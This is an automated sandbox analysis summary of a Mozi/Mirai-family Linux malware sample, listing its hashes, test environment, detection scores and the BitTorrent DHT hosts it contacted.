
Mozi.m

Status: finished
Submission Time: 2021-01-06 14:56:50 +01:00
Malicious
Spreader
Trojan
Evader
Mirai

Details

  • Analysis ID:
    336612
  • API (Web) ID:
    575112
  • Analysis Started:
    2021-01-06 14:56:50 +01:00
  • Analysis Finished:
    2021-01-06 15:05:57 +01:00
  • MD5:
    eec5c6c219535fba3a0492ea8118b397
  • SHA1:
    292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21
  • SHA256:
    12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef

System: Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 88.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)

Verdict: malicious

Score: 100/100
Signature detections: 42/60
Antivirus/engine detections: 20/29
Classification: malicious

IPs


Domains

Name                     IP
dht.transmissionbt.com   87.98.162.88
bttracker.acc.umu.se     130.239.18.159
router.bittorrent.com    67.215.246.10
router.utorrent.com      82.221.103.244
bttracker.debian.org     0.0.0.0

URLs


Dropped files
